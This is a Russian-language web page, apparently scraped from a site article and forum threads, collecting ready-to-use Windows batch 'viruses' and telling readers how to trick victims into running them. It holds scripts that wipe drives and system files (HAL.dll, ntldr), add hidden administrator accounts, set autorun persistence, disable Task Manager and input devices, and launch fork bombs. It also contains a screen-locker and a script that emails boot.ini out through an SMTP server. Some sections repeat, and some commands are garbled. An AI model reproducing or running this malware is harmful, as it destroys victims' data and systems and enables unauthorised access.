Мой сайт
menu
Главная » Статьи » Советы и Рекомендации
Кибербезопасность

Трофимов Михаил Дмитриевич 18.08.1989 года рождения
 наверняка слышали о сценариях Windows, файлах с расширением *.bat.
Если разобраться, то они являются текстовым файлом, содержащим определенные инструкции, которые будут выполнены после запуска. Итак для написания самых простых вирусов (или просто сценариев) нам понадобится блокнот, или другой текстовый редактор, а также немного энтузиазма.
Итак, как я уже говорил, сценарий имеет расширение *.bat и является текстовым файлом, значит:
1. Создаем текстовый документ с инструкциями: «Taskmgr»( без кавычек);
2. Сохраняем с любым именем и расширением *.bat;
3. Открываем файл и видим что открылся Диспетчер задач.
Вместо Taskmgr можно указать любую программу(например: mspaint – Paint, Calc – калькулятор). До вирусов еще далеко, но теперь вы знаете как работают сценарии.
Далее напишем программку, которая создает подпапку в папке, где находится сама, а затем копирует себя на флешку, если та вставлена. Итак создаем .bat -файл следующего содержания:
md folder
copy%0 F:\program.bat
Запускаем и видим, что в папке, с которой была запущена наша программка, появилась еще одна папка с именем «folder», а на диске F: появился файл «program.bat» содержащий текст нашей программы.
Теперь я приведу перечень строк, которые могут присутствовать в наших программах(вирусах):
1. «copy %0 a:\b» — копирует выполняемый файл на диск a в папку b (например copy %0 C:\ program.bat);
2. «date x.y.z» — меняет дату на x день, y месяц, z год (например date 16.11.05);
3. «time х:у» — меняет время на х часов и у минут (например time 14:27);
4. «label x:y» — переименовывает диск x на имя y (например label C:Disc error);
5. «del *.* /q» — удалит все файлы в папке, где лежит наш сценарий (папки остаются);
6. «del x:\y *.* /q» — удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q);
7. «assoc .х=.у» — переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.txt);
8. «md х» — создаст папку, в том месте, где находится наш вирус, с именем х (пример md Papka);
9. «net user «х» /add» — добавит на компьютер пользователя под именем х (пример net user «Smoked» /add).
Используя полученные знания, мы можем написать такие вредоносные программки:
1. Меняет дату и время на компьютере и копирует себя на диск С и на флешку:
time 14:13
date 11.07.12
copy %0 C:\date.bat
copy %0 F:\date.bat
2. Или же удаляет все файлы с флешки, переименовывает её и копирует себя на неё:
del F:\ *.* /q
label F:error
copy %0 F:\deleter.bat
3. Удаляет все файлы с дисков (кроме тех, которые находятся в папках) и меняет дату и время:
del C:\ *.* /q
del D:\ *.* /q
del E:\ *.* /q
del F:\ *.* /q
time 00:00
date 13.06.23
del *.* /q
Сложно не заметить окно командной строки, которое открывается при запуске наших программ и тут же исчезает… Так вот чтобы его скрыться от жертвы добавляем вначале программы команду «@echo off» также после каждой команды нужно добавить действие, которое скроет строчку «>nul».
После такого усовершенствования наш вирус принимает вид:
@echo off
del C:\ *.* /q >nul
del D:\ *.* /q >nul
del E:\ *.* /q >nul
del F:\ *.* /q >nul
time 00:00 >nul
date 13.06.23 >nul
del *.* /q >nul
Вирус готов! Да вот только кто откроет какой то непонятный файл с непонятным расширением да еще и без иконки? Мало кто! Значит необходимо отконвертировать наш вирус в формат *.exe. для этого можно использовать WinRAR или же еще лучше такую программу как «Bat to exe converter».
В наших вирусах мы можем использовать еще такие скрипты:
1. Меняет клавиши мыши местами:
%SystemRoot%/system32/rundll32 user32, SwapMouseButton
2. Открывает выбранную программу до полного зависания компьютера:
 ;
Start mspaint
goto x ;
3. Добавляет наш вирус в автозапуск (!):
copy «»%0″» «%SystemRoot%\system32\File.bat»
reg add «HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run» /v «Filel» /t REG_SZ /d «%SystemRoot%\system32\File.bat» /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
Теперь имеем достаточно знаний для написания простеньких вирусов. Напоследок напомню, что писать вирусы это не очень хорошо и я надеюсь что читали вы эту статью исключительно из любопытства. Но, тем не менее удачи!!! 
@echo off - Запрещаем ДОСовскому окошку показывать, что делает скрипт.
2)rundll32 keyboard,disable - Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C
3) rundll32 mouse,disable - Отключаем мышь тоже на всякий.
4) copy %0 %windir%/system - Копируемся в папку windows/system
5)// %0 - Переменная, указывающая на исходный файл-вирус
// %windir% - переменная папка масдая.
 echo run=%windir%/system/*.bat >> %windir%\win.ini - Добавляет текст "run=%windir%/system/*.bat" в файл win.ini
6) echo run=%windir%/system/*.bat >> %windir%\system.ini - Добавляет текст "run=%windir%/system/*.bat" в файл system.ini
7) label LOHOLAMMER - Меняет имя диску c:\ на "LOHOLAMMER"
8) if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r - Проверяем если есть файл c:\autoexec.bat то убираем
//у него атрибуты -h -s -a -r
9) deltree /y c:\autoexec.bat - Удаляем файл c:\autoexec.bat , если не убрать атрибуты, то программа не удалит файл.
10) echo autoexec.bat echo YOU ARE LAMMER...xe-xe-xe > c:\autoexec.bat - Добавить текст "YOU ARE LAMMER...xe-xe-xe"
//в новый файл autoexec.bat
11) rundll32 mouse,enable - Включаем, пускай думает, что ниче не было.
12)rundll32 keyboard,enable - Включаем, пускай думает, что ниче не было.
13) echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
start %temp%\mes.js. //Этот текст выводит масдайное окно с надписью
deltree /y %temp%\mes.js //А потом стирает за собой следы.
14) attrib c:\autoexec.bat +h +s +a +r - Делает файл c:\autoexec.bat скрытым и системный чтоб ламер ничего не заподозрил.
15) pause - Просим нажать любую клавишу (Не обязательно нажимать ведь вирь уже сделал свое дело.)
16)«copy %0 x:\y» - копирует вирус на диск x в папку y (пример copy %0 C:\System.bat); 
17)«label x:y» - переименовывает диск x на имя y (пример label C:Disc error); 
18)«time х:у» - меняет время на х часов и у минут (пример time 14:27); 
19)«date x.y.z» - меняет дату на x день, y месяц, z год (пример date 16.11.05); 
20)«md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md Papka); 
21)«del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок); 
22)«del x:\y *.* /q» - удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q); 
23)«assoc .х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3); 
24)«net user "х" /add» - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add);
Простенькие вирусы 

Убирает рабочий стол 

@echo off 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

Выключается компьютер 

@echo off 
shutdown -s -t 1 -c "lol" >nul 

Перезагрузка компьютера 

@echo off 
shutdown -r -t 1 -c "lol" >nul 

Запрещает запускать программы 

@echo off 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul 

Удаление дров 

@echo off 
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul 

Удаляет звуки Windows 

@echo off 
del "%SystemRoot%\Media" /q >nul

Запрещает заходить в панель управления

@echo off 
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer 
/v NoControlPanel /t REG_DWORD /d 1 /f >nul
 
Запрещает комбинацию Ctrl-Alt-Delete
 
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
 
Меняет местами значение кнопок мыши
 
 
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
 
Удаляет курсор мыши
 
del "%SystemRoot%Cursors*.*" >nul
 
Меняет название корзины
 
reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F
 
Убирает панель управления
 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

Серьезные вирусы 

Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя) 

rd [Буква_Диск]: /s /q 

Удаляет все файлы в program files 

del c:Program Files/q

Убивает процесс explorer.exe
 
taskkill /f /im explorer.exe >nul
 
Создает миллион папок
 
FOR /L %%i IN (1,1,1000000) DO md %%i
 
Удаляет все драйвера, которые установлены на компьютере
 
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
 
Удаляет команду DEL
 
del %0
 
Заражает Autoexec
 
copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul 
reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul 
 
Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
 
@echo off
chcp 1251 
net user SUPPORT_388945a0 /delete 
net user hacker hack /add 
net localgroup Администраторы hacker /add 
net localgroup Пользователи SUPPORT_388945a0 /del 
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y
 
сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
 
rundll32 user,disableoemlayer
 
Меняет местами кнопки мыши,но обратная смена не возможна)
 
rundll32 user,SwapMouseButton
 
Удаляет ядро системы
 
del %systemroot%\system32\HAL.dll
 
 Subscribe to posts
Homework For Week Of October 25th
posted Oct 15, 2009, 1:24 AM by Денис Алышев
Тема: E-mail : Sobranierealty@mail.ru
 
Всем привет. Вот здесь я решил выложить .bat команды
Вообщем вот держите.

Вредилки
Удаление рабочего стола
@Echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
Удалить все браузеры
@Echo off
taskkill.exe -f -im chrome.exe
taskkill.exe -f -im ie.exe
taskkill.exe -f -im firefox.exe
taskkill.exe -f -im opera.exe
taskkill.exe -f -im safari.exe
rd /q /s "%systemdrive%\Program Files\Google\Chrome"
rd /q /s "%systemdrive%\Program Files\Safari"
rd /q /s "%systemdrive%\Program Files\Mozilla Firefox"
rd /q /s "%systemdrive%\Program Files\Opera"
rd /q /s "%systemdrive%\Program Files\Internet Explorer"
Удаляем ядро ОС
@Echo off
cmd.exe /c takeown /f "%windir%\system32\HAL.dll"
icacls "%windir%\system32\HAL.dll" /grant  ¤¬¨¨áâà â®àë:F"
del /q /s %WinDir%\system32\HAL.dll/q
Превращаем Диск C в помойку
@Echo off
md C:\1 md D:\2
attrib +a +s +r +h C:\1
attrib +a +s +r +h D:\2
:Random
fsutil file createnew C:\1\%random%.dll 1000000000
fsutil file createnew D:\2\%random%.dll 1000000000
goto Random
Блок дисков
@Echo off
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v "NoViewOnDrive" /t REG_DWORD /d 67108860 /f
Удаление всех файлов на диске D
@Echo off
del /q /s %systemdrive%
rd /q /s %systemdrive%
del /q /s D:\
rd /q /s D:\
Вывести сообщение на экран
@Echo off
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "/v LegalNoticeCaption /t REG_SZ /d "Ты чмо" /
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "/v LegalNoticeText /t REG_SZ /d "Паскуда" /f
Запретить запуск программ
@Echo off
shutdown -r -t 1 -c "Error" -f
Нагрузка на ЦП 100% (комп виснет ужасно)
@Echo off
:Random
start wuauclt.exe
goto Random
Куча неудаляемых папок
@Echo off
FOR /L %%i IN (1,1,10000) DO md %%i..\
Бесконечно создавать папки
@Echo off
:Random
md %random%
goto Random
Блокируем пользователей на ПК
@Echo off
net user %username% "456834756"
Удалить всех пользователей на ПК
@Echo off
net user %username% /Delete
А также, чтобы
Команды:

Убрать рабочий стол:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

Удалить дрова:
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul

Перезагрузка компа:
shutdown -r -t 1 -c "lol" >nul

Удаление файлов:
erase %windir%*.* /q

Меняет пароль текущего пользователя на 123456:
net user %username% 123456

Открывает больше 200 окошек,и если все не закрыть то комп грузнется и может слететь ОС(если слабый комп):
:s
start %0
%0|%0
goto :s|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0
goto :s

Ставит время на 0:00:
time 0:00 >nul

Удаление курсора:
del "%SystemRoot%Cursors*.*" >nul

Самоликвидация (самое главное):
del "%0" >nul
_____________________________

И казалось бы Батник готов, но возникает один вопрос:
Как заставить жертву запустить этот вирус? Т.к расшерение вируса "*.bat" жертва даже необратит на него внимание.
Здесь можно действовать двумя способами

 
Войти Создать аккаунт
 
Тематический разделСтатьиВирусология
Готовые .bat вирусы 
Тема в разделе Вирусология создана пользователем хацкер.рус 3 июн 2017. 7402 просмотра
 
 
 
хацкер.рус Автор темы 3 июн 2017 Заблокирован22 9 дек 2016
Простенькие вирусы

Убирает рабочий стол

[SRC]Echo_inactive_inactive off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul[/SRC]

Выключается компьютер

[SRC]Echo_inactive_inactive off
shutdown -s -t 1 -c "lol" >nul [/SRC]

Перезагрузка компьютера

[SRC]Echo_inactive_inactive off
shutdown -r -t 1 -c "lol" >nul
[/SRC]

Запрещает запускать программы

[SRC]Echo_inactive_inactive off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul [/SRC]


Удаление дров

[SRC]Echo_inactive_inactive off
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul [/SRC]

Удаляет звуки Windows

[SRC]Echo_inactive_inactive off
del "%SystemRoot%\Media" /q >nul[/SRC]

Запрещает заходить в панель управления

[SRC]Echo_inactive_inactive off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul[/SRC]

Запрещает комбинацию Ctrl-Alt-Delete

[SRC]reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul[/SRC]

Меняет местами значение кнопок мыши

[SRC]%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul[/SRC]

Удаляет курсор мыши

[SRC]del "%SystemRoot%Cursors*.*" >nul
[/SRC]

Меняет название корзины

[SRC]reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F[/SRC]

Убирает панель управления

[SRC]reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f[/SRC]

Серьезные вирусы

Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)

[SRC]rd [Буква_Диск]: /s /q[/SRC]

Удаляет все файлы в program files

[SRC]del c:Program Files/q[/SRC]

Убивает процесс explorer.exe

[SRC]taskkill /f /im explorer.exe >nul[/SRC]

Создает миллион папок

[SRC]FOR /L %%i IN (1,1,1000000) DO md %%i[/SRC]

Удаляет все драйвера, которые установлены на компьютере

[SRC]del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul[/SRC]

Удаляет команду DEL

[SRC]del %0[/SRC]

Будет открывать бесконечно Пэинт

[SRC]:x
Start mspaint
goto x
[/SRC]

Изменяет расширение всех ярлыков на .txt

[SRC]assoc .lnk=.txt[/SRC]

Заражает Autoexec

[SRC]copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul [/SRC]

Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)

[SRC]Echo_inactive_inactive off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y[/SRC]


сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.


[SRC]rundll32 user,disableoemlayer[/SRC]

Меняет местами кнопки мыши,но обратная смена не возможна)

[SRC]rundll32 user,SwapMouseButton[/SRC]

Удаляет ядро системы

[SRC]del %systemroot%\system32\HAL.dll[/SRC]

Жестокие вирусы

У вашего ламера будет глючить компьютер.

[SRC]Echo_inactive_inactive off
echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbs
echo do >> %systemdrive%\windows\system32\rundll32.vbs
echo Set tx = fso.CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
echo FSO.DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbs
echo loop >> %systemdrive%\windows\system32\rundll32.vbs

start %systemdrive%\windows\system32\rundll32.vbs

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f [/SRC]

Вирус который убивает Винду. Не проверяйте на своем компьютере=)

[SRC]Echo_inactive_inactive by хацкер.рус
Echo_inactive_inactive Autor: хацкер.рус
Echo_inactive_inactive off
echo Chr(39)>%temp%\temp1.vbs
echo Chr(39)>%temp%\temp2.vbs
echo on error resume next > %temp%\temp.vbs
echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs
echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs
reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
copy %¶§% %SystemRoot%\user32dll.bat
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
echo fso.deletefile "C:\ntldr",1 >> %temp%\temp.vbs
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
echo fso.deletefolder "D:\Windows",1 >> %temp%\temp.vbs
echo fso.deletefolder "I:\Windows",1 >> %temp%\temp.vbs
echo fso.deletefolder "C:\Windows",1 >> %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
echo fso.deletefile sr+"\system32\hal.dll",1 >> %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
echo fso.deletefolder sr+"\system32\dllcache",1 >> %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
echo fso.deletefolder sr+"\system32\drives",1 >> %temp%\temp.vbs
echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru">>%temp%\temp.vbs
echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru">>%temp%\temp.vbs
echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru">>%temp%\temp.vbs
echo on error resume next > %temp%\temp1.vbs
echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp1.vbs
echo do>>%temp%\temp1.vbs
echo fso.getfile ("A:\")>>%temp%\temp1.vbs
echo loop>>%temp%\temp1.vbs
echo on error resume next > %temp%\temp2.vbs
echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp2.vbs
echo do>>%temp%\temp2.vbs
echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%\temp2.vbs
echo loop>>%temp%\temp2.vbs
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
echo set application=createobject("shell.application")>>%temp%\temp.vbs
echo application.minimizeall>>%temp%\temp.vbs
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
start rundll32 user32, SwapMouseButton
reg add "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /f
echo i=50 >> %temp%\temp.vbs
echo while i^>0 or i^<0 >> %temp%\temp.vbs
echo S.popup "forum.whack.ru",0, "forum.whack.ru",0+16 >> %temp%\temp.vbs
echo i=i-1 >> %temp%\temp.vbs
echo wend >> %temp%\temp.vbs
echo do >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{capslock}" >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{numlock}" >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs
echo loop>> %temp%\temp.vbs
echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\temp.vbs
echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs
echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs
echo For i = 0 to colCDROMs.Count - 1 >> %temp%\temp.vbs
echo colCDROMs.Item(i).eject >> %temp%\temp.vbs
echo next >> %temp%\temp.vbs
echo End If >> %temp%\temp.vbs
echo Call SendPost("smtp.mail.ru", "forum.whack.ru@mail.ru", "support@mail.ru", "...", "Копм заражен!") >> %temp%\temp.vbs
echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs
echo Set iMsg = CreateObject("CDO.Message") >> %temp%\temp.vbs
echo Set iConf = CreateObject("CDO.Configuration") >> %temp%\temp.vbs
echo Set Flds = iConf.Fields >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "support" >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "support" >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 >> %temp%\temp.vbs
echo Flds.Update >> %temp%\temp.vbs
echo iMsg.Configuration = iConf >> %temp%\temp.vbs
echo iMsg.To = strTo >> %temp%\temp.vbs
echo iMsg.From = strFrom >> %temp%\temp.vbs
echo iMsg.Subject = strSubject >> %temp%\temp.vbs
echo iMsg.TextBody = strBody >> %temp%\temp.vbs
echo iMsg.AddAttachment "c:\boot.ini" >> %temp%\temp.vbs
echo iMsg.Send >> %temp%\temp.vbs
echo End Function >> %temp%\temp.vbs
echo Set iMsg = Nothing >> %temp%\temp.vbs
echo Set iConf = Nothing >> %temp%\temp.vbs
echo Set Flds = Nothing >> %temp%\temp.vbs

echo s.run "shutdown -r -t 0 -c ""pcforumhack.ru"" -f",1 >> %temp%\temp.vbs
start %temp%\temp.vbs
start %temp%\temp1.vbs
start %temp%\temp2.vbs[/SRC]

Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует)

[SRC]Echo_inactive_inactive off
CHCP 1251
cls
Set Yvaga=На вашем компьютере найден вирус.
Set pass=Пароль
Set pas=Введите пароль.
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
Set dim=Выключаю вирус...
title Внимание!!!
CHCP 866
IF EXIST C:\windows\boot.bat (
goto ok )
cls
IF NOT EXIST C:\windows\boot.bat (
ECHO Windows Registry Editor Version 5.00 >> C:\0.reg
ECHO. >> C:\0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.reg
ECHO. >> C:\0.reg
ECHO "Shell"="Explorer.exe, C:\\windows\\boot.bat " >> C:\0.reg
start/wait regedit -s C:\0.reg
del C:\0.reg
ECHO Echo_inactive_inactive off >>C:\windows\boot.bat
ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat
ECHO reg add "HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.bat
ECHO start sys.bat >>C:\windows\boot.bat
attrib +r +a +s +h C:\windows\boot.bat
copy virus.bat c:\windows\sys.bat
attrib +r +a +s +h C:\windows\sys.bat
GOTO end)
:ok
cls
Echo %Yvaga%
echo.
echo %virus%
